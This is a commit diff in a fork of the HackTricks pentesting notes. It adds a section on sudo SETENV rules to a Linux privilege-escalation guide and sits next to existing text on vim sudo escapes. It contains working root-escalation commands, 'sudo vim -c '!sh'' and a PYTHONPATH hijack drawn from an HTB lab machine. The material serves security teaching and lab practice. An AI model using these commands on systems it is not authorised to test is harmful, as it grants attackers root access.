coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] one page modified

Browse Source
This commit is contained in:
CPol 2020-09-27 23:19:15 +00:00 committed by gitbook-bot
parent aae1c80da6
commit a36f7f8a61
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 16 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
linux-unix/privilege-escalation/README.md
View File

@ -688,7 +688,6 @@ Sudo configuration might allow a user to execute some command with another user
```text ```text
$ sudo -l $ sudo -l
User demo may run the following commands on crashlab: User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/vim
``` ```
@ -699,6 +698,22 @@ In this example the user `demo` can run `vim` as `root`, it is now trivial to ge
sudo vim -c '!sh' sudo vim -c '!sh'
``` ```
### SETENV
This directive allows the user to **set an environment variable** while executing something:
```bash
$ sudo -l
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
```
This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** in order to load an arbitrary python library while executing the script as root:
```bash
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
```
### Sudo execution bypassing paths ### Sudo execution bypassing paths
**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_ **Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_